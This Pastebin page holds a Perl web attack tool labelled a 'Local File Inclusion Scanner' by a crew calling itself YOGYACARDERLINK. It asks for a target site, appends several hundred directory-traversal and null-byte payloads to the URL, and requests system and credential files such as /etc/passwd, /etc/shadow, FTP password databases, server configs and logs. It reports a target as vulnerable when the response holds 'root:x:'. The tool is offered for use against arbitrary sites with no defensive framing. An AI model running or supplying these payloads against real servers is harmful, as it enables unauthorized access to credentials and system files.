API tools faq
paste
Advertisement
cybercode

LFI Scanner - Perl

cybercode
Jan 16th, 2012
1,699
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 20.61 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl -w
  2.  
  3. use LWP::UserAgent;
  4. use HTTP::Request;
  5.  
  6. system('clear','cls');
  7.  
  8. print "|----------------------------------------------------|\n";
  9. print "|  YOGYACARDERLINK Full Local File Inclusion Scanner |\n";
  10. print "| Coded by : v3n0m                                   |\n";
  11. print "| Date     : December 19 2009                        |\n";
  12. print "| sHoutz   : All Yogyacarderlink Crew                |\n";
  13. print "|                                                    |\n";
  14. print "|                                                    |\n";
  15. print "|                         YOGYACARDERLINK            |\n";
  16. print "|----------------------------------------------------|\n\n";
  17. print "\nInsert target: ";
  18. chomp(my $target = <STDIN>);
  19.  
  20. if($target !~ /http:\/\//) { $target = "http://$target"; }
  21.  
  22. print "\npress [enter] to check the version of httpd[...]\n";
  23. $httpd =<STDIN>;
  24.  
  25. $host = $target;
  26. $useragent = LWP::UserAgent->new;
  27. $resp = $useragent->head($host);
  28. print $resp->headers_as_string;
  29.  
  30. print "\npress [enter] to check the vulnerability in lfi[...]\n";
  31. $start =<STDIN>;
  32.  
  33.  
  34. @vulnerabilities = ('/etc/passwd',
  35. '/etc/shadow',
  36. '/etc/group',
  37. '/etc/security/group',
  38. '/etc/security/passwd',
  39. '/etc/security/user',
  40. '/etc/security/environ',
  41. '/etc/security/limits',
  42. '/usr/lib/security/mkuser.default',
  43. '/apache/logs/access.log',
  44. '/apache/logs/error.log',
  45. '/apache/logs/access.log',
  46. '/apache/logs/error.log',
  47. '/apache/logs/access.log',
  48. '/etc/httpd/logs/acces_log',
  49. '/etc/httpd/logs/acces.log',
  50. '/etc/httpd/logs/error_log',
  51. '/etc/httpd/logs/error.log',
  52. '/var/www/logs/access_log',
  53. '/var/www/logs/access.log',
  54. '/usr/local/apache/logs/access_ log',
  55. '/usr/local/apache/logs/access. log',
  56. '/var/log/apache/access_log',
  57. '/var/log/apache2/access_log',
  58. '/var/log/apache/access.log',
  59. '/var/log/apache2/access.log',
  60. '/var/log/access_log',
  61. '/var/log/access.log',
  62. '/var/www/logs/error_log',
  63. '/var/www/logs/error.log',
  64. '/usr/local/apache/logs/error_log',
  65. '/usr/local/apache/logs/error.log',
  66. '/var/log/apache/error_log',
  67. '/var/log/apache2/error_log',
  68. '/var/log/apache/error.log',
  69. '/var/log/apache2/error.log',
  70. '/var/log/error_log',
  71. '/var/log/error.log',
  72. '/var/log/httpd/access_log',
  73. '/var/log/httpd/error_log',
  74. '/var/log/httpd/access_log',
  75. '/var/log/httpd/error_log',
  76. '/apache/logs/error.log',
  77. '/apache/logs/access.log',
  78. '/apache/logs/error.log',
  79. '/apache/logs/access.log',
  80. '/apache/logs/error.log',
  81. '/apache/logs/access.log',
  82. '/apache/logs/error.log',
  83. '/apache/logs/access.log',
  84. '/apache/logs/error.log',
  85. '/apache/logs/access.log',
  86. '/apache2/logs/error.log',
  87. '/apache2/logs/access.log',
  88. '/apache2/logs/error.log',
  89. '/apache2/logs/access.log',
  90. '/apache2/logs/error.log',
  91. '/apache2/logs/access.log',
  92. '/apache2/logs/error.log',
  93. '/apache2/logs/access.log',
  94. '/apache2/logs/error.log',
  95. '/apache2/logs/access.log',
  96. '/logs/error.log',
  97. '/logs/access.log',
  98. '/logs/error.log',
  99. '/logs/access.log',
  100. '/logs/error.log',
  101. '/logs/access.log',
  102. '/logs/error.log',
  103. '/logs/access.log',
  104. '/logs/error.log',
  105. '/logs/access.log',
  106. '/etc/httpd/logs/acces_log',
  107. '/etc/httpd/logs/acces.log',
  108. '/etc/httpd/logs/error_log',
  109. '/etc/httpd/logs/error.log',
  110. '/usr/local/apache/logs/access_log',
  111. '/usr/local/apache/logs/access.log',
  112. '/usr/local/apache/logs/error_log',
  113. '/usr/local/apache/logs/error.log',
  114. '/usr/local/apache2/logs/access_log',
  115. '/usr/local/apache2/logs/access.log',
  116. '/usr/local/apache2/logs/error_log',
  117. '/usr/local/apache2/logs/error.log',
  118. '/var/www/logs/access_log',
  119. '/var/www/logs/access.log',
  120. '/var/www/logs/error_log',
  121. '/var/www/logs/error.log',
  122. '/var/log/httpd/access_log',
  123. '/var/log/httpd/access.log',
  124. '/var/log/httpd/error_log',
  125. '/var/log/httpd/error.log',
  126. '/var/log/apache/access_log',
  127. '/var/log/apache/access.log',
  128. '/var/log/apache/error_log',
  129. '/var/log/apache/error.log',
  130. '/var/log/apache2/access_log',
  131. '/var/log/apache2/access.log',
  132. '/var/log/apache2/error_log',
  133. '/var/log/apache2/error.log',
  134. '/var/log/access_log',
  135. '/var/log/access.log',
  136. '/var/log/error_log',
  137. '/var/log/error.log',
  138. '/opt/lampp/logs/access_log',
  139. '/opt/lampp/logs/error_log',
  140. '/opt/xampp/logs/access_log',
  141. '/opt/xampp/logs/error_log',
  142. '/opt/lampp/logs/access.log',
  143. '/opt/lampp/logs/error.log',
  144. '/opt/xampp/logs/access.log',
  145. '/opt/xampp/logs/error.log',
  146. '/Program Files\Apache Group\Apache\logs\access.log',
  147. '/Program Files\Apache Group\Apache\logs\error.log',
  148. '/apache/logs/error.log',
  149. '/apache/logs/access.log',
  150. '/apache/logs/error.log',
  151. '/apache/logs/access.log',
  152. '/apache/logs/error.log',
  153. '/apache/logs/access.log',
  154. '/apache/logs/error.log',
  155. '/apache/logs/access.log',
  156. '/apache/logs/error.log',
  157. '/apache/logs/access.log',
  158. '/apache/logs/error.log',
  159. '/apache/logs/access.log',
  160. '/logs/error.log',
  161. '/logs/access.log',
  162. '/logs/error.log',
  163. '/logs/access.log',
  164. '/logs/error.log',
  165. '/logs/access.log',
  166. '/logs/error.log',
  167. '/logs/access.log',
  168. '/logs/error.log',
  169. '/logs/access.log',
  170. '/logs/error.log',
  171. '/logs/access.log',
  172. '/etc/httpd/logs/acces_log',
  173. '/etc/httpd/logs/acces.log',
  174. '/etc/httpd/logs/error_log',
  175. '/etc/httpd/logs/error.log',
  176. '/var/www/logs/access_log',
  177. '/var/www/logs/access.log',
  178. '/usr/local/apache/logs/access_log',
  179. '/usr/local/apache/logs/access.log',
  180. '/var/log/apache/access_log',
  181. '/var/log/apache/access.log',
  182. '/var/log/access_log',
  183. '/var/www/logs/error_log',
  184. '/var/www/logs/error.log',
  185. '/usr/local/apache/logs/error_log',
  186. '/usr/local/apache/logs/error.log',
  187. '/var/log/apache/error_log',
  188. '/var/log/apache/error.log',
  189. '/var/log/access_log',
  190. '/var/log/error_log',
  191. '/usr/local/apache/conf/httpd.conf',
  192. '/usr/local/apache2/conf/httpd.conf',
  193. '/etc/httpd/conf/httpd.conf',
  194. '/etc/apache/conf/httpd.conf',
  195. '/usr/local/etc/apache/conf/httpd.conf',
  196. '/etc/apache2/httpd.conf',
  197. '/usr/local/apache/conf/httpd.conf',
  198. '/usr/local/apache2/conf/httpd.conf',
  199. '/usr/local/apache/httpd.conf',
  200. '/usr/local/apache2/httpd.conf',
  201. '/usr/local/httpd/conf/httpd.conf',
  202. '/usr/local/etc/apache/conf/httpd.conf',
  203. '/usr/local/etc/apache2/conf/httpd.conf',
  204. '/usr/local/etc/httpd/conf/httpd.conf',
  205. '/usr/apache2/conf/httpd.conf',
  206. '/usr/apache/conf/httpd.conf',
  207. '/usr/local/apps/apache2/conf/httpd.conf',
  208. '/usr/local/apps/apache/conf/httpd.conf',
  209. '/etc/apache/conf/httpd.conf',
  210. '/etc/apache2/conf/httpd.conf',
  211. '/etc/httpd/conf/httpd.conf',
  212. '/etc/http/conf/httpd.conf',
  213. '/etc/apache2/httpd.conf',
  214. '/etc/httpd/httpd.conf',
  215. '/etc/http/httpd.conf',
  216. '/etc/httpd.conf',
  217. '/opt/apache/conf/httpd.conf',
  218. '/opt/apache2/conf/httpd.conf',
  219. '/var/www/conf/httpd.conf',
  220. '/private/etc/httpd/httpd.conf',
  221. '/private/etc/httpd/httpd.conf.default',
  222. '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
  223. '/Volumes/webBackup/private/etc/httpd/httpd.conf',
  224. '/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
  225. '/Program Files\Apache Group\Apache\conf\httpd.conf',
  226. '/Program Files\Apache Group\Apache2\conf\httpd.conf',
  227. '/Program Files\xampp\apache\conf\httpd.conf',
  228. '/usr/local/php/httpd.conf.php',
  229. '/usr/local/php4/httpd.conf.php',
  230. '/usr/local/php5/httpd.conf.php',
  231. '/usr/local/php/httpd.conf',
  232. '/usr/local/php4/httpd.conf',
  233. '/usr/local/php5/httpd.conf',
  234. '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
  235. '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
  236. '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
  237. '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
  238. '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
  239. '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
  240. '/usr/local/etc/apache/vhosts.conf',
  241. '/etc/php.ini',
  242. '/bin/php.ini',
  243. '/etc/httpd/php.ini',
  244. '/usr/lib/php.ini',
  245. '/usr/lib/php/php.ini',
  246. '/usr/local/etc/php.ini',
  247. '/usr/local/lib/php.ini',
  248. '/usr/local/php/lib/php.ini',
  249. '/usr/local/php4/lib/php.ini',
  250. '/usr/local/php5/lib/php.ini',
  251. '/usr/local/apache/conf/php.ini',
  252. '/etc/php4.4/fcgi/php.ini',
  253. '/etc/php4/apache/php.ini',
  254. '/etc/php4/apache2/php.ini',
  255. '/etc/php5/apache/php.ini',
  256. '/etc/php5/apache2/php.ini',
  257. '/etc/php/php.ini',
  258. '/etc/php/php4/php.ini',
  259. '/etc/php/apache/php.ini',
  260. '/etc/php/apache2/php.ini',
  261. '/web/conf/php.ini',
  262. '/usr/local/Zend/etc/php.ini',
  263. '/opt/xampp/etc/php.ini',
  264. '/var/local/www/conf/php.ini',
  265. '/etc/php/cgi/php.ini',
  266. '/etc/php4/cgi/php.ini',
  267. '/etc/php5/cgi/php.ini',
  268. '/php5\php.ini',
  269. '/php4\php.ini',
  270. '/php\php.ini',
  271. '/PHP\php.ini',
  272. '/WINDOWS\php.ini',
  273. '/WINNT\php.ini',
  274. '/apache\php\php.ini',
  275. '/xampp\apache\bin\php.ini',
  276. '/NetServer\bin\stable\apache\php.ini',
  277. '/home2\bin\stable\apache\php.ini',
  278. '/home\bin\stable\apache\php.ini',
  279. '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
  280. '/usr/local/cpanel/logs',
  281. '/usr/local/cpanel/logs/stats_log',
  282. '/usr/local/cpanel/logs/access_log',
  283. '/usr/local/cpanel/logs/error_log',
  284. '/usr/local/cpanel/logs/license_log',
  285. '/usr/local/cpanel/logs/login_log',
  286. '/usr/local/cpanel/logs/stats_log',
  287. '/var/cpanel/cpanel.config',
  288. '/var/log/mysql/mysql-bin.log',
  289. '/var/log/mysql.log',
  290. '/var/log/mysqlderror.log',
  291. '/var/log/mysql/mysql.log',
  292. '/var/log/mysql/mysql-slow.log',
  293. '/var/mysql.log',
  294. '/var/lib/mysql/my.cnf',
  295. '/etc/mysql/my.cnf',
  296. '/etc/my.cnf',
  297. '/etc/logrotate.d/proftpd',
  298. '/www/logs/proftpd.system.log',
  299. '/var/log/proftpd',
  300. '/etc/proftp.conf',
  301. '/etc/protpd/proftpd.conf',
  302. '/etc/vhcs2/proftpd/proftpd.conf',
  303. '/etc/proftpd/modules.conf',
  304. '/var/log/vsftpd.log',
  305. '/etc/vsftpd.chroot_list',
  306. '/etc/logrotate.d/vsftpd.log',
  307. '/etc/vsftpd/vsftpd.conf',
  308. '/etc/vsftpd.conf',
  309. '/etc/chrootUsers',
  310. '/var/log/xferlog',
  311. '/var/adm/log/xferlog',
  312. '/etc/wu-ftpd/ftpaccess',
  313. '/etc/wu-ftpd/ftphosts',
  314. '/etc/wu-ftpd/ftpusers',
  315. '/usr/sbin/pure-config.pl',
  316. '/usr/etc/pure-ftpd.conf',
  317. '/etc/pure-ftpd/pure-ftpd.conf',
  318. '/usr/local/etc/pure-ftpd.conf',
  319. '/usr/local/etc/pureftpd.pdb',
  320. '/usr/local/pureftpd/etc/pureftpd.pdb',
  321. '/usr/local/pureftpd/sbin/pure-config.pl',
  322. '/usr/local/pureftpd/etc/pure-ftpd.conf',
  323. '-/etc/pure-ftpd.conf',
  324. '/etc/pure-ftpd/pure-ftpd.pdb',
  325. '/etc/pureftpd.pdb',
  326. '/etc/pureftpd.passwd',
  327. '/etc/pure-ftpd/pureftpd.pdb',
  328. '/usr/ports/ftp/pure-ftpd/',
  329. '/usr/ports/net/pure-ftpd/',
  330. '/usr/pkgsrc/net/pureftpd/',
  331. '/usr/ports/contrib/pure-ftpd/',
  332. '/var/log/pure-ftpd/pure-ftpd.log',
  333. '/logs/pure-ftpd.log',
  334. '/var/log/pureftpd.log',
  335. '/var/log/ftp-proxy/ftp-proxy.log',
  336. '/var/log/ftp-proxy',
  337. '/var/log/ftplog',
  338. '/etc/logrotate.d/ftp',
  339. '/etc/ftpchroot',
  340. '/etc/ftphosts',
  341. '/var/log/exim_mainlog',
  342. '/var/log/exim/mainlog',
  343. '/var/log/maillog',
  344. '/var/log/exim_paniclog',
  345. '/var/log/exim/paniclog',
  346. '/var/log/exim/rejectlog',
  347. '/var/log/exim_rejectlog',
  348. '../etc/passwd',
  349. '../../etc/passwd',
  350. '../../../etc/passwd',
  351. '../../../../etc/passwd',
  352. '../../../../../etc/passwd',
  353. '../../../../../../etc/passwd',
  354. '../../../../../../../etc/passwd',
  355. '../../../../../../../../etc/passwd',
  356. '../../../../../../../../../etc/passwd',
  357. '../../../../../../../../../../etc/passwd',
  358. '../../../../../../../../../../../etc/passwd',
  359. '../../../../../../../../../../../../etc/passwd',
  360. '../../../../../../../../../../../../../etc/passwd',
  361. '../../../../../../../../../../../../../../etc/passwd',
  362. '../../../../../../../../../../../../../../../..etc/passwd',
  363. '../etc/shadow',
  364. '../../etc/shadow',
  365. '../../../etc/shadow',
  366. '../../../../etc/shadow',
  367. '../../../../../etc/shadow',
  368. '../../../../../../etc/shadow',
  369. '../../../../../../../etc/shadow',
  370. '../../../../../../../../etc/shadow',
  371. '../../../../../../../../../etc/shadow',
  372. '../../../../../../../../../../etc/shadow',
  373. '../../../../../../../../../../../etc/shadow',
  374. '../../../../../../../../../../../../etc/shadow',
  375. '../../../../../../../../../../../../../etc/shadow',
  376. '../../../../../../../../../../../../../../etc/shadow',
  377. '../etc/group',
  378. '../../etc/group',
  379. '../../../etc/group',
  380. '../../../../etc/group',
  381. '../../../../../etc/group',
  382. '../../../../../../etc/group',
  383. '../../../../../../../etc/group',
  384. '../../../../../../../../etc/group',
  385. '../../../../../../../../../etc/group',
  386. '../../../../../../../../../../etc/group',
  387. '../../../../../../../../../../../etc/group',
  388. '../../../../../../../../../../../../etc/group',
  389. '../../../../../../../../../../../../../etc/group',
  390. '../../../../../../../../../../../../../../etc/group',
  391. '../etc/security/group',
  392. '../../etc/security/group',
  393. '../../../etc/security/group',
  394. '../../../../etc/security/group',
  395. '../../../../../etc/security/group',
  396. '../../../../../../etc/security/group',
  397. '../../../../../../../etc/security/group',
  398. '../../../../../../../../etc/security/group',
  399. '../../../../../../../../../etc/security/group',
  400. '../../../../../../../../../../etc/security/group',
  401. '../../../../../../../../../../../etc/security/group',
  402. '../etc/security/passwd',
  403. '../../etc/security/passwd',
  404. '../../../etc/security/passwd',
  405. '../../../../etc/security/passwd',
  406. '../../../../../etc/security/passwd',
  407. '../../../../../../etc/security/passwd',
  408. '../../../../../../../etc/security/passwd',
  409. '../../../../../../../../etc/security/passwd',
  410. '../../../../../../../../../etc/security/passwd',
  411. '../../../../../../../../../../etc/security/passwd',
  412. '../../../../../../../../../../../etc/security/passwd',
  413. '../../../../../../../../../../../../etc/security/passwd',
  414. '../../../../../../../../../../../../../etc/security/passwd',
  415. '../../../../../../../../../../../../../../etc/security/passwd',
  416. '../etc/security/user',
  417. '../../etc/security/user',
  418. '../../../etc/security/user',
  419. '../../../../etc/security/user',
  420. '../../../../../etc/security/user',
  421. '../../../../../../etc/security/user',
  422. '../../../../../../../etc/security/user',
  423. '../../../../../../../../etc/security/user',
  424. '../../../../../../../../../etc/security/user',
  425. '../../../../../../../../../../etc/security/user',
  426. '../../../../../../../../../../../etc/security/user',
  427. '../../../../../../../../../../../../etc/security/user',
  428. '../../../../../../../../../../../../../etc/security/user',
  429. '../../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
  430. '../../../../../../../../../../../../../../../etc/httpd/logs/acces.log%00',
  431. '../../../../../../../../../../../../../../../etc/httpd/logs/error_log%00',
  432. '../../../../../../../../../../../../../../../etc/httpd/logs/error.log%00',
  433. '../../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
  434. '../../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
  435. '../../../../../../../../../../../../../../../usr/local/apache/logs/error_log%00',
  436. '../../../../../../../../../../../../../../../usr/local/apache/logs/error.log%00',
  437. '../../../../../../../../../../../../../../../usr/lib/security/mkuser.default%00',
  438. '../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00',
  439. '../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log%00',
  440. '../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log%00',
  441. '../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log%00',
  442. '../../../../../../../../../../../../../../../apache/logs/access.log%00',
  443. '../../../../../../../../../../../../../../../apache/logs/error.log%00',
  444. '../../../../../../../../../../../../../../../apache2/logs/error.log%00',
  445. '../../../../../../../../../../../../../../../apache2/logs/access.log%00',
  446. '../../../../../../../../../../../../../../../var/www/logs/access_log%00',
  447. '../../../../../../../../../../../../../../../var/www/logs/access.log%00',
  448. '../../../../../../../../../../../../../../../var/log/apache/access_log%00',
  449. '../../../../../../../../../../../../../../../var/log/apache2/access_log%00',
  450. '../../../../../../../../../../../../../../../var/log/apache/access.log%00',
  451. '../../../../../../../../../../../../../../../var/log/apache2/access.log%00',
  452. '../../../../../../../../../../../../../../../var/www/logs/error_log%00',
  453. '../../../../../../../../../../../../../../../var/www/logs/error.log%00',
  454. '../../../../../../../../../../../../../../../var/log/access_log%00',
  455. '../../../../../../../../../../../../../../../var/log/access.log%00',
  456. '../../../../../../../../../../../../../../../var/log/apache/error_log%00',
  457. '../../../../../../../../../../../../../../../var/log/apache2/error_log%00',
  458. '../../../../../../../../../../../../../../../var/log/apache/error.log%00',
  459. '../../../../../../../../../../../../../../../var/log/apache2/error.log%00',
  460. '../../../../../../../../../../../../../../../var/log/error_log%00',
  461. '../../../../../../../../../../../../../../../var/log/error.log%00',
  462. '../../../../../../../../../../../../../../../var/log/httpd/access_log%00',
  463. '../../../../../../../../../../../../../../../var/log/httpd/error_log%00',
  464. '../../../../../../../../../../../../../../../var/log/httpd/access.log%00',
  465. '../../../../../../../../../../../../../../../var/log/httpd/error.log%00',
  466. '../../../../../../../../../../../../../../../opt/lampp/logs/access_log%00',
  467. '../../../../../../../../../../../../../../../opt/lampp/logs/error_log%00',
  468. '../../../../../../../../../../../../../../../opt/xampp/logs/access_log%00',
  469. '../../../../../../../../../../../../../../../opt/xampp/logs/error_log%00',
  470. '../../../../../../../../../../../../../../../opt/lampp/logs/access.log%00',
  471. '../../../../../../../../../../../../../../../opt/lampp/logs/error.log%00',
  472. '../../../../../../../../../../../../../../../opt/xampp/logs/access.log%00',
  473. '../../../../../../../../../../../../../../../opt/xampp/logs/error.log%00',
  474. '../../../../../../../../../../../../../../../etc/httpd/logs/acces_log',
  475. '../../../../../../../../../../../../../../../etc/httpd/logs/acces.log',
  476. '../../../../../../../../../../../../../../../etc/httpd/logs/error_log',
  477. '../../../../../../../../../../../../../../../etc/httpd/logs/error.log',
  478. '../../../../../../../../../../../../../../../usr/local/apache/logs/access_log',
  479. '../../../../../../../../../../../../../../../usr/local/apache/logs/access.log',
  480. '../../../../../../../../../../../../../../../usr/local/apache/logs/error_log',
  481. '../../../../../../../../../../../../../../../usr/local/apache/logs/error.log',
  482. '../../../../../../../../../../../../../../../usr/lib/security/mkuser.default',
  483. '../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log',
  484. '../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log',
  485. '../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log',
  486. '../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log',
  487. '../../../../../../../../../../../../../../../apache/logs/access.log',
  488. '../../../../../../../../../../../../../../../apache/logs/error.log',
  489. '../../../../../../../../../../../../../../../apache2/logs/error.log',
  490. '../../../../../../../../../../../../../../../apache2/logs/access.log',
  491. '../../../../../../../../../../../../../../../var/www/logs/access_log',
  492. '../../../../../../../../../../../../../../../var/www/logs/access.log',
  493. '../../../../../../../../../../../../../../../var/log/apache/access_log',
  494. '../../../../../../../../../../../../../../../var/log/apache2/access_log',
  495. '../../../../../../../../../../../../../../../var/log/apache/access.log',
  496. '../../../../../../../../../../../../../../../var/log/apache2/access.log',
  497. '../../../../../../../../../../../../../../../var/www/logs/error_log',
  498. '../../../../../../../../../../../../../../../var/www/logs/error.log',
  499. '../../../../../../../../../../../../../../../var/log/access_log',
  500. '../../../../../../../../../../../../../../../var/log/access.log',
  501. '../../../../../../../../../../../../../../../var/log/apache/error_log',
  502. '../../../../../../../../../../../../../../../var/log/apache2/error_log',
  503. '../../../../../../../../../../../../../../../var/log/apache/error.log',
  504. '../../../../../../../../../../../../../../../var/log/apache2/error.log',
  505. '../../../../../../../../../../../../../../../var/log/error_log',
  506. '../../../../../../../../../../../../../../../var/log/error.log',
  507. '../../../../../../../../../../../../../../../var/log/httpd/access_log',
  508. '../../../../../../../../../../../../../../../var/log/httpd/error_log',
  509. '../../../../../../../../../../../../../../../var/log/httpd/access.log',
  510. '../../../../../../../../../../../../../../../var/log/httpd/error.log',
  511. '../../../../../../../../../../../../../../../opt/lampp/logs/access_log',
  512. '../../../../../../../../../../../../../../../opt/lampp/logs/error_log',
  513. '../../../../../../../../../../../../../../../opt/xampp/logs/access_log',
  514. '../../../../../../../../../../../../../../../opt/xampp/logs/error_log',
  515. '../../../../../../../../../../../../../../../opt/lampp/logs/access.log',
  516. '../../../../../../../../../../../../../../../opt/lampp/logs/error.log',
  517. '../../../../../../../../../../../../../../../opt/xampp/logs/access.log',
  518. '../../../../../../../../../../../../../../../opt/xampp/logs/error.log');
  519.  
  520. print "\tPAYLOAD LOADED IN PROGRESS...\n\n";
  521.  
  522.  
  523. foreach $scan(@vulnerabilities){
  524.  
  525. $url = $target.$scan;
  526. $request = HTTP::Request->new(GET=>$url);
  527. $useragent = LWP::UserAgent->new();
  528.  
  529. $response = $useragent->request($request);
  530. if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerable;}
  531. else { $msg = "Not Vulnerable";}
  532.  
  533. print "$scan..........[$msg]\n";
  534. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!